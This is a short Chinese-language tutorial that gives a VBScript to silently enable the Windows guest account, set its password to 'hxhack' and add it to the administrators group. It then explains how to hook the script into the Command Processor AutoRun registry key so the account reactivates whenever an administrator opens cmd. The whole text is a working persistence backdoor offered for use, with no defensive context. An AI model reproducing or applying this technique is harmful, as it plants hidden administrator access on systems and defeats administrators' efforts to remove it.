dim wsh
set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0 （激活guest账号）
wsh.run "net user guest hxhack",0 （修改guest密码为hxhack）
wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的：
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok，然后运行vbs文件，不死账号出来拉
如果管理员把你动过手脚的guest账号停了，当时他运行cmd的时候又自动启动了guest账号，因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件.